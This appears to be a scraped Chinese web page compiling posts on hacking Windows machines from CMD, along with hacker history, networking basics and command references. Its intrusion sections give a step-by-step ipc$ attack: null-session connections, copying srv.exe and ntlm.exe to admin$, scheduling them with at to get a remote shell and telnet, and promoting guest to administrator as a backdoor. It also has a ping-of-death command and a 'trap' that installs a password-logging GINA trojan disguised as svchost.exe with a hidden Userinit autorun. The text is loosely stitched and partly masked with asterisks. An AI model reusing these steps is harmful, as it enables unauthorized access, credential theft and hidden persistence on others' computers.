怎么用CMD进行入侵电脑？

使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接，使用这个命令你可以得到远程主机的NETBIOS信息，比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。

-a 使用这个参数，只要你知道了远程主机的机器名称，就可以得到它的NETBIOS信息（下同）。

-A 这个参数也可以得到远程主机的NETBIOS信息，但需要你知道它的IP。

-n 列出本地机器的NETBIOS信息。

当得到了对方的IP或者机器名的时候，就可以使用nbtstat命令来进一步得到对方的信息了，这又增加了我们入侵的保险系数。

什么是黑客？

黑客

一名黑客(hacker)是一个喜欢用智力通过创造性 *** 来挑战脑力极限的人，特别是他们所感兴趣的领域，例如电脑编程或电器工程。

黑客最早源自英文hacker，早期在美国的电脑界是带有褒义的。但在媒体报导中，黑客一词往往指那些“软件骇客”(software cracker)。

黑客一词，原指热心于计算机技术，水平高超的电脑专家，尤其是程序设计人员。

但到了今天，黑客一词已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙。对这些人的正确英文叫法是Cracker，有人翻译成“骇客”。

黑客和骇客根本的区别是：黑客们建设，而骇客们破坏。

黑客一词一般有以下四种意义：

一个对（某领域内的）编程语言有足够了解，可以不经长时间思考就能创造出有用的软件的人。

一个恶意（一般是非法地）试图破解或破坏某个程序、系统及 *** 安全的人。这个意义常常对那些符合条件(1)的黑客造成严重困扰，他们建议媒体将这群人称为“骇客”(cracker)。有时这群人也被叫做“黑帽黑客”。

一个试图破解某系统或 *** 以提醒该系统所有者的系统安全漏洞。这群人往往被称做“白帽黑客”或“匿名客”(sneaker)或红客。许多这样的人是电脑安全公司的雇员，并在完全合法的情况下攻击某系统。

一个通过知识或猜测而对某段程序做出（往往是好的）修改，并改变（或增强）该程序用途的人。

“脚本小孩”则指那些完全没有或仅有一点点骇客技巧，而只是按照指示或运行某种骇客程序来达到破解目的的人

著名黑客

Richard Stallman--传统型大黑客，Stallman在1971年受聘成为美国麻省理工学院人工智能实验室程序员。

Ken Thompson和Dennis Ritchie--贝尔实验室的电脑科学操作组程序员。两人在1969年发明了Unix操作系统。

John Draper（以咔嚓船长，Captain Crunch闻名）--发明了用一个塑料哨子打免费 ***

Mark Abene（以Phiber Optik而闻名）--鼓舞了全美无数青少年“学习”美国内部 *** 系统是如何运作的

Robert Morris--康奈尔大学毕业生，在1988年不小心散布了之一只互联网蠕虫。

Kevin Mitnick--之一位被列入fbi通缉犯名单的骇客。

Kevin Poulsen--Poulsen于1990年成功地控制了所有进入洛杉矶地区KIIS-FM电台的 *** 线而赢得了该电台主办的有奖听众游戏。

Vladimir Levin--这位数学家领导了俄罗斯骇客组织诈骗花旗银行向其分发1000万美元。

Steve Wozniak--苹果电脑创办人之一。

Tsotumu Shimomura--于1994年攻破了当时最着名黑客Steve Wozniak的银行帐户。

Linus Torvalds--他于1991年开发了着名的Linux内核，当时他是芬兰赫尔辛基大学电脑系学生。

Johan Helsingius--黑尔森尤斯于1996年关闭自己的小商店后开发出了世界上更流行的，被称为“penet.fi"的匿名回函程序，他的麻烦从此开始接踵而至。其中最悲惨的就是sceintology教堂抱怨一个penet.fi用户在网上张贴教堂的秘密后芬兰警方在1995年对他进行了搜查，后来他封存了这个回函程序。

Tsutomu Shimomura--能记起他是因为抓了米特尼克。

Eric Raymond--Eric Raymond就一直活跃在计算机界，从事各种各样的计算机系统开发工作。同时，Eric Raymond更热衷于自由软件的开发与推广，并撰写文章、发表演说，积极推动自由软件运动的发展，为自由软件作出了巨大贡献。他写的《大教堂和市集》等文章，是自由软件界的经典美文，网景公司就是在这篇文章的影响下决定开放他们的源代码，使浏览器成为了自由软件大家族中的重要一员

红客 —— 一个让人肃然起敬的名字！

红客可以说是中国黑客起的名字。英文“honker”是红客的译音。

红客，是一群为捍卫中国的 *** 而战的黑客们！

他们的精神是令人敬佩的！

破解者 —— 喜欢探索软件程序！

破解者 —— Cracker

破解者，他们的目标是一些需要注册的软件。他们通常利用Debug，找出内存中的密码。

蓝客 —— 特别喜欢蓝色的黑客们！

蓝客，也属于黑客群。

蓝客，是指一些利用或发掘系统漏洞，D.o.S（Denial Of Service）系统，或者令个人操作系统（Windows）蓝屏。

“蓝客”一词由中国蓝客联盟（www.cnlanker.com）在2001年9月提出。当初的蓝客联盟（中国蓝客联盟）是一个非商业性的民间 *** 技术机构，联盟进行有组织有计划的计算机与 *** 安全技术方面的研究、交流、整理与推广工作，提倡自由、开放、平等、互助的原则。同时还是一个民间的爱国团体，蓝盟的行动将时刻紧密结合时政，蓝盟的一切言论和行动都建立在爱国和维护中国尊严、 *** 与领土完整的基础上，蓝盟的声音和行动是中华民族气节的体现。中国蓝客联盟（LUC）简称蓝盟，组建于2001年10月1日。2002年4月，公安部门受外交部压力开始调查此次事件，蓝盟核心人员在当月受到公安机关的传讯、调查，计算机被收缴送往上级公安厅取证、调查。后联盟被告知必须无条件无限期关闭网站，并永久停止使用“蓝客联盟”名号。

2002年6月2日，蓝盟在IRC频道召开“中国蓝客联盟告别会”，与会几百位网友了解、见证了蓝盟的组建及被迫关闭的内幕。

中国蓝客联盟只有一个，那便是2001年10月至2002年6月间的 cnlanker.net，那是我们美好的回忆，那是

曾经一起分享胜利的喜悦、共同度过那些灰暗的日子的唯一见证。可惜的是如今这个域名已不在国人手上。

从2002年6月开始，任何自称蓝客联盟或蓝盟的组织、网站均属于其他网友的自发的个人行为，与最初的蓝盟

毫无任何关系。

现在的 cnlanker.com 是最初组建蓝盟的一群人的回忆，蓝盟永远不会重建。

飞客 —— 电信 *** 的先行者！

飞客，经常利用程控交换机的漏洞，进入并研究电信 *** 。

虽然他们不出名，但对电信系统作出了很大的贡献！

一.什么是黑客

在力求当一个黑客前,我们要先了解什么是黑客

Hacker -- 黑客

热衷研究、撰写程序的专才，且必须具备乐于追根究底、穷究问题的特质。

在黑客圈中，hacker一词无疑是带有正面的意义，例如system hacker熟悉操作系统的设计与维护；password hacker精于找出使用者的密码，若是computer hacker则是通晓计算机，可让计算机乖乖听话的高手。

黑客基本上是一项业余嗜好，通常是出于自己的兴趣，而非为了赚钱或工作需要。

根据开放原始码计划创始人Eric Raymond对此字的解释，hacker与cracker是分属两个不同世界的族群，基本差异在于，hacker是有建设性的，而cracker则专门搞破坏。

hacker原意是指用斧头砍材的工人，最早被引进计算机圈则可追溯自1960年代。

加州柏克莱大学计算机教授Brian Harvey在考证此字时曾写到，当时在麻省理工学院中(MIT)的学生通常分成两派，一是tool，意指乖乖牌学生，成绩都拿甲等；另一则是所谓的hacker，也就是常逃课，上课爱睡觉，但晚上却又精力充沛喜欢搞课外活动的学生。

这跟计算机有什么关系？一开始并没有。不过当时hacker也有区分等级，就如同tool用成绩比高下一样。真正一流hacker并非整天不学无术，而是会热衷追求某种特殊嗜好，比如研究 *** 、铁道(模型或者真的)、科幻小说，无线电，或者是计算机。也因此后来才有所谓的computer hacker出现，意指计算机高手。

对一个黑客来说,学会入侵和破解是必要的,但最主要的还是编程,毕竟,使用工具是体现别人的思路,而程序是自己的想法.一句话--编程实现一切!

对于一个骇客来说,他们只追求入侵的 *** ,不在乎技术,他们不会编程,不知道入侵的具体细节.

"黑客"在人们脑中的形象就是一个蓬头乱发,戴着高度眼镜,驼着背弓着腰,成天趴在电脑面前的人.其实黑客和正常人一模一样,他们并无什么特殊之处.有些人也许很少上电脑,成天运动,工作,但他们的技术和精神已经达到的黑客的标准,有些人天天爬在电脑前,到处瞎混,但他们仍不是黑客.

人们总是认为黑客就是破坏者,其实从某种意义上来说,黑客也在为计算机技术的发展做出很大的贡献.如果没有高明的黑客,就没有资深的网管;如果没有完美的木马,就没有杰出的杀毒软件;没有了黑客, *** 技术就很难发展下去.当然,网管其实也是黑客,如果他不知道别人怎么进攻,自己要怎么防守呢??

黑客一词在圈外或媒体上通常被定义为：专门入侵他人系统进行不法行为的计算机高手。不过这类人士在hacker眼中是属于层次较低的cracker(骇客)。如果黑客是炸弹制造专家,那么CRACKER就是 *** .

现在, *** 上出现了越来越多的Cracker,他们只会入侵,使用扫描器到处乱扫,用IP炸弹炸人家,毫无目的地入侵,破坏着,他们并无益于电脑技术的发展,反而有害于 *** 的安全和造成 *** 瘫痪,给人们带来巨大的经济和精神损失.

我们不能做Cracker,我们要力求当HACKER!!

二.HACKING的预备 *** 知识

1.什么是IP

IP就是一个地址,在外网没有一个IP是相同的,它就像身份证号码一样,给每台进入 *** 的电脑一个身份证号码.但是对于大部分用户来说,这个号码是不固定的,在你重新连接到INTERNET时,IP可能会被重新分配.不过有些机器申请了固定的IP,这样就便于其他电脑找到它,并提供服务.一般的IP的格式为: a.b.c.d (0 = a,b,c,d = 255)例如 218.242.161.231 , 212.13.123.52 ..... 由192.168开头的是局域网的IP,127.0.0.1是用来检测 *** 的自己的IP.就是说任何一台电脑来说,不管是否连接到INTERNET上,127.0.0.1对于自己来说都是自己.就是说,每台电脑都是由4位的256进制数组成的.

2.什么是 *** 协议,数据包

*** 协议就是一套双方约定好的通信协议.就像对暗号一样,有特定的约定来达成连接.其中的"数据包就是一个一个

(1) 面向连接的TCP协议

TCP是面向连接的.“面向连接”就是在正式通信前必须要与对方建立起连接。比如你给别人打 *** ，必须等线路接通了、对方拿起话筒才能相互通话。TCP（Tran *** ission Control

Protocol，传输控制协议）是基于连接的协议，也就是说，在正式收发数据前，必须和对方建立可靠的连接。一个TCP连接必须要经过三次“对话”才能建立起来，其中的过程非常复杂，我们这里只做简单、形象的介绍，你只要做到能够理解这个过程即可。我们来看看这三次对话的简单过程：主机A向主机B发出连接请求数据包：“我想给你发数据，可以吗？”，这是之一次对话；主机B向主机A发送同意连接和要求同步（同步就是两台主机一个在发送，一个在接收，协调工作）的数据包：“可以，你什么时候发？”，这是第二次对话；主机A再发出一个数据包确认主机B的要求同步：“我现在就发，你接着吧！”，这是第三次对话。三次“对话”的目的是使数据包的发送和接收同步，经过三次“对话”之后，主机A才向主机B正式发送数据。TCP协议能为应用程序提供可靠的通信连接，使一台计算机发出的字节流无差错地发往 *** 上的其他计算机，对可靠性要求高的数据通信系统往往使用TCP协议传输数据。

(2) 面向非连接的UDP协议

“面向非连接”就是在正式通信前不必与对方先建立连接，不管对方状态就直接发送。这与现在风行的手机短信非常相似：你在发短信的时候，只需要输入对方手机号就OK了。UDP（User Data Protocol，用户数据报协议）是与TCP相对应的协议。它是面向非连接的协议，它不与对方建立连接，而是直接就把数据包发送过去！UDP协议是面向非连接的协议，没有建立连接的过程。正因为UDP协议没有连接的过程，所以它的通信效果高；但也正因为如此，它的可靠性不如TCP协议高。 *** 就使用UDP发消息，因此有时会出现收不到消息的情况。

附表：tcp协议和udp协议的差别

|---------------------------------|

| 属性\协议 |TCP |UDP |

|------------+---------+----------|

|是否连接 |面向连接 |面向非连接|

|------------+---------+----------|

|传输可靠性 |可靠 |不可靠 |

|------------+---------+----------|

|应用场合 |大量数据 |少量数据 |

|------------+---------+----------|

|速度 |慢 |快 |

|---------------------------------|

(3)什么是端口(PORT)

PORT,意思为港口,但在电脑里叫端口.但是端口不是形象的,而是抽象的.电脑上有很多的端口(65535个),但是它们大部分都不开,每个 *** 连接都要用一个端口,就象把用一跟线把两个电脑连起来,插座就是端口.有些端口有他们特定的用途,例如网页服务器要开80端口,FTP服务器要开21端口

常用端口

21--ftp 下载

23--telnet 远程登陆,入侵后打开给自己留后门

25- *** tp 尽管重要，但似乎没什么可利用的

53--domain 同上

79--finger 可知道用户信息了,但是现在很少了

80--http HTTP服务器

110--pop 收信的

139(445)--netbios 共享,远程登陆,很有价值,但是有经验的人不开

135--RPC 远程溢出的大洞的端口

3389--win2000超级终端

我们在入侵成功后就要为自己运行木马,打开一个端口,为自己以后回来留后门.

(4)什么是服务

服务就是SERVICE,例如要做HTTP服务器的就要安装World Wide Web Publishing服务.服务,是为他人提供服务的程序,这个程序会在开机时自动加载,并打开端口等待对方连接并向对方提供服务.我们可以在入侵对方机器后,启动或安装一些服务(SUCH AS 远程桌面,TELNET...),这些服务都是MICROSOFT的,所以不用担心被杀毒的发现.在开了一些远程管理的服务后,我们就可以很方便地回到被侵入过的主机了.

常见的服务列表:

名称 默认端口 98可装 2000Pro 2000SERVER

FTP 提供下载服务 21 x x o

SSH LINUX远程登陆 22 x x x

TELNET WINDOWS远程命令行管理 23 x o o

Simple Mail 邮件服务器 25 x x o

Finger 可以知道用户信息,现在很少了 79 x x x

WWW HTTP 网页服务器 80 x x o

pop2 一种邮件服务 109 x x o

pop3 同上 110 x x o

RpcDcom 更大的溢出漏洞的所在 135 x o默认 o默认

NetBios 共享,远程登陆,很有利用价值 139 o(无价值) o默认 o默认

REMOTE SERVICE 图形界面的远程登陆,最有价值 3389 x x o(强烈推荐)

(5)常用的工具

HACKER用的工具,大致可分这几种:

[1]扫描器

在攻击一个目标前要先了解对方开了什么端口,在扫肉鸡时要知道那些肉鸡开了端口可以被入侵.扫描器就是帮助你寻找攻击对象或了解攻击对象存在什么漏洞,开了什么端口.常用的扫描器有SUPERSCAN,X-SCAN,IP TOOLS....强烈推荐SUPERSCAN和X-SCAN.如果你在扫开端口的机器时,用SUPERSCAN,因为它快;在扫漏洞时,用X-SCAN,因为它功能全!!

[2]溢出工具

溢出就是把比一个寄存器能存放的东西还多的东西放到一个寄存器里,然后就造成溢出,使系统运行准备好了的SHELL CODE.

溢出的VB例子:

dim a as integer

a=111111111111111

在找到一些有溢出漏洞的机器后,就用溢出工具来对它进行溢出,然后直接拿到SHELL或帐号.

[3]后门程序

后门的服务端,安装在肉鸡上,开机自动等待对方控制.以前的后门都是一个标准的SOCKET在某个端口监听,但是这样很容易被发现,于是便出现了ICMP后门.但是现在的主流还是用TCP的后门.常用的后门有:冰河,TELNET(是WINDOWS的远程管理服务,用OPENTELNET可以远程开启TELNET服务!),DJXYXS.EXE(用来开SERVER的3389服务)

[4]连接工具

其实就是后门客户端.WINDOWS自带了很多,例如3389登陆器的MSTSC.EXE,TELNET客户端TELNET.EXE.......强烈推荐NC,它把许多 *** 功能汇集到了一起!

[5]破解密码程序

就是用很多的字符串来猜测密码.当猜不到时,就只好死算,A不行换B,B不行换C,C不行换D.......总之很浪费时间,密码长点1年都破不出来,不推荐

[6]进程程序

用来管理进程的,有PSECEC.EXE(远程开别人SHELL的,像TELNET一样,不过对方不需开),PSKILL.EXE(远程,本地杀进程),PSLIST.EXE(远程,本地查看进程).PS系列的3个程序是十分有用的,本人强烈推荐!!它不仅仅能够帮助你管理远程的肉鸡,而且在杀病毒时十分有用,它能杀掉WINDOWS TASK MANAGER杀不掉的进程.

(6)黑前准备

[1]首先,你要有一台能跑的电脑(这不是废话吗),

[2]是要有操作系统(更好是一个WINDOWS 2000 SERVER,一个LINUX,没LINUX也可以,2000PRO也可以,不过2000SERVER可以给自己练习,强烈推荐SERVER)

[3]有 *** ,更好是宽带,不是的话要有快的肉鸡才行.

[3]安装一个防火墙,推荐天网2.5.1

[4]注册一个 *** ,有邮箱,注册一个空间(注册地址www.websamb *** ,支持FTP,WWW)

[5]别急,把前面的文章再看一便(别K我)

三.学习使用DOS基础命令

使用DOS是黑客最最基本的技能,每个人都要会熟练的使用DOS,使用2000的DOS,不用任何工具就可以完成一次入侵,而且大部分的工具都是在DOS窗口的环境下运行的,所以大家一定要学好!!

(1)如何启动DOS

这里说到的DOS,是XP,2000自带的DOS,98正因为对 *** 的支持很差,所以我们不能入侵98,也不能用98来入侵.所以用98的朋友请把98换成2000或者XP,NT,2003.

DOS在2000里就是CMD.EXE,98里是COMMAND.EXE(2000里也有COMMAND.EXE,不过这个DOS是不支持中文的).启动 *** :开始,运行,CMD (或者COMMAND),确定.然后跳出来以下画面:

C:\documents and Settings\Administratorcmd

Microsoft Windows 2000 [Version 5.00.2195]

(C) 版权所有 1985-2000 Microsoft Corp.

C:\documents and Settings\Administrator

==================================================================================================

《黒客有什么可怕 设个陷阱逮住他》

如今网上黑客横行，稍不留神就可能被黑客光顾，避如前段时间我们空间商的服务器就被入侵了，数据都被删光了，所以要想在网上生存，做好安全措施是必不可少的。一般我们都只重视对机器进行安全设置，而往往忽略了被入侵后的信息收集问题，今天我就介绍三种让黑客留下痕迹的 *** ，希望能对大家有所帮助。

一、利用“木马”进行记录

1.木马简介

这里要用到的是一个很特殊的dll木马，它可以把通过终端登陆的用户名、密码，以及域信息记录到指定文件中。不要以为这些信息没什么用哦！有时候就得靠这些零散的信息来找入侵的人。

下载地址：http://www.chinesehack.org/down/show.asp?id=3770;down=1

在下载的压缩包内，有三个文件：

SysGina32.dll--这个就是可以记录用户名和密码的东东了。

Gina.exe--这是安装DLL木马用的程序，有了它后安装起来就很方便了。

使用 *** .txt--这个很熟悉吧！中文帮助文件哦！有什么不懂的可以查查。

2.安装木马

先把SysGina32.dll和Gina.exe放在同一目录下，并将Gina.exe改名为svchost.exe(你也可以改成其它名字，为的是不让黑客注意到)，然后打开CMD，切换到保存这两个文件的文件夹，输入命令：svchost.exe -install，当出现“All Done，Gina setup success”信息时，安装就成功了。

注意：

a.该木马已被杀毒软件查杀，所以安装时请关闭杀毒软件(不是关闭防火墙哦！)，而且以后重启时杀毒软件不能一起启动，以后杀一次毒重新装一次该木马。不过如果你能让该木马不被杀毒软件的话，那就没这么麻烦了。

b.为了不让黑客发现我们设的陷阱，更好将Gina.exe文件改名，而且要改的艺术一点，比如上面我把它改成了“svchost.exe”，这样就很难发现了，如果你改成了其它名字，安装时命令就要换成“文件名.exe -install”。

c.SysGina32.dll和Gina.exe这两个文件不一定要复制到系统安装目录的system32下，不过更好不要太引人注意，如果被黑客发现，那就可能适得其反了(木马也会记下你的密码的)。

d.如果出现的信息是“Found Exist Gina”，这说明你机器已经装过该木马了，此时键入“Y”覆盖即可。

3.查看“踪迹”

经过以上设置后，如果有人通过终端服务登录你的机器，那么他的用户名和密码就会被记录到“C:＼WINNT＼system32＼GinaPwd.txt”这个文件中，打开这文件就可以看到入侵者的踪迹了。由于该木马也会记录你的密码，所以每次进入机器时，请先打开GinaPwd.txt这文件，把你的用户名和密码删掉，顺便查一下有没有其它人登录过。

4.删除木马

如果你的机器不幸被人中了该木马，那么请按如下 *** 删除：

先下载该木马，在CMD下输入命令：gina.exe -remove，当出现“ Gina Dll was removed success”时(如图3)，就表示删除成功了，接着重启机器即可。

注意：如果你把gina.exe改名了，命令也要做相应改变：文件名.exe -remove。

二、写个批处理记录黑客行踪

1.认识批处理

对于批处理文件，你可以把它理解成批量完成你指定命令的文件，它的扩展名为 .bat 或 .cmd，只要在文本文件中写入一些命令，并把它保存为.bat 或 .cmd格式，然后双击该文件，系统就会按文本文件中的命令逐条执行，这样可以节省你许多的时间。

2.编写批处理文件

打开记事本，然后输入如下命令：

@echo off

date /t d:＼3389.txt

attrib +s +h d:＼3389.bat

attrib +s +h d:＼3389.txt

time /t d:＼3389.txt

netstat -an |find "ESTABLISHED" |find ":3389" d:＼3389.txt

然后把文件保存为d:＼3389.bat，这里我解释一下命令的意思，date和time是用于获取系统时间的，这样可以让你知道黑客在某天的某个时刻入侵。“attrib +s +h d:＼3389.bat”和“attrib +s +h d:＼3389.txt”这两个命令是用来隐藏3389.bat和3389.txt这两个文件的，因为在登录时，由于会启动d:＼3389.bat这个文件，所以会有一个CMD窗口一闪而过，有经验的黑客应该能判断出这窗口是记录用的，所以他可能会到处找这个记录文件，用了以上两个命令后，即使他用系统自带的搜索功能以3389为关键字进行搜索，也找不到上面3389.bat和3389.txt这两个文件，哈哈！很棒吧！至于“netstat -an |find "ESTABLISHED" |find ":3389" d:＼3389.txt”这个命令则是记录通过终端的连结状况的，明白了吧！

接下来我们要让系统启动时自动运行d:＼3389.bat这文件，我用的 *** 是修改注册表，依次展开：HKEY_LOCAL_MACHINE＼SOFTWARE＼Microsoft＼WindowsNT＼CurrentVersion＼Winlogon，找到“Userinit”这个键值，这个键值默认为c:＼WINNT＼system32＼userinit.exe，不知你注意到没有，在最后有一个逗号，我们要利用的就是这逗号，比如我上面写的3389.bat文件路径为d:＼3389.bat，那么我只要在逗号后面加上“d:＼3389.bat”即可，这样启动时3389.bat这文件就会运行，选这个键值的原因是因为它隐蔽，如果是加在Run键值下的话是很容易被发现的。最后提醒一点，键值末尾的逗号别忘了加上去哦！

4.查看记录

前面我们用了attrib命令把3389.bat和3389.txt这两个文件隐藏起来，下面我们来让它们重新显示。

打开CMD，切换到保存这两个文件的路径，这里是切换到“d:＼”目录，输入命令：attrib -s -h d:＼3389.bat和attrib -s -h d:＼3389.txt，这时再到d盘看看，是不是出现了？打开文件即可查看登录情况，从图中我们可以看出，10.51.5.36这IP连结到了我的3389端口(我的IP是10.51.5.35)。

三、记录黑客动作

有了以上两道防线，我们就能知道黑客的用户名、密码、以及入侵时的IP了，不过这样好像还不够，要是能知道黑客都干了些什么就更好了，下面我们再设置一个陷阱，这里要用到的工具是“计算机系统日志”。

下载地址：http://js-http.skycn.net:8080/down/syslog.zip

该软件的特色就是可以在后台记录所有运行过的程序和窗口名称，并且有具体的时期，以及登录的用户名，很恐怖哦！下面咱们来设陷阱吧！

1.记录日志

双击压缩包内的主程序，点击“软件试用”进入主界面，在“日志文件保存路径”处点击“浏览”选择保存路径并进行命名，这里保存在c:＼winnt＼log.txt。然后钩选“日志记录随计算机自动启动”。

注意：

a.为了防止黑客找到记录日志的文件，你可以用上面提到的命令：attrib +s +h c:＼winnt＼log.txt进行隐藏。

b.更好不要将这个记录文件和上面的3389.txt放一个目录下，这样万一被发现其中一个，不至于使另一个也一同被发现。

c.软件在“任务管理器”的进程中显示名称为“syslog”，而且未注册版本会在20分钟后自动停止记录，所以只能用来对付菜鸟黑客啦！而且还得先花点“银子”，哈哈！

接下来在“程序密码保护”处输入一个复杂点的密码，点击“开始日志”。这时软件会提醒你隐藏后的热键为“Ctrl+Q”，请记住这个热键，以后要唤出软件时就得靠它了。

2.查看动作

想知道这样设置后记录下来的东西是什么样吗？那就快来看看吧。怎么样？对这种记录结果你还满意吗？

跪求cmd黑客攻击指令和cmd电脑命令！悬赏大大滴有

一 相关命令

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射 *** 驱动器,效果一样.

二 经典入侵模式

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以之一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32ntlm

输入ntlm启动（这里的C:\WINNT\system32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机).

ipc$经典入侵步骤：

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功，连接你的肉鸡

常用的 *** 命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt；

下面纯手打，上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off .txt|exit 添加文本

echo 内容 .txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组

怎样利用“CMD”进行黑客入侵？

net use ipipc$ " " /user:" " 建立IPC空链接

net use ipipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: ipc$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: ipc$ 登陆后映射对方C：到本地为H:

net use ipipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名　密码　/add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名　 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time 目标ip 查看对方时间

net time 目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view ip 查看对方局域网内开启了哪些共享

net config 显示系统 *** 设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的 *** 连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的 *** 连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

二：

del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）

move 盘符路径要移动的文件名　存放移动文件的路径移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，" "和" " 是重定向命令

at id号 开启已注册的某个计划任务

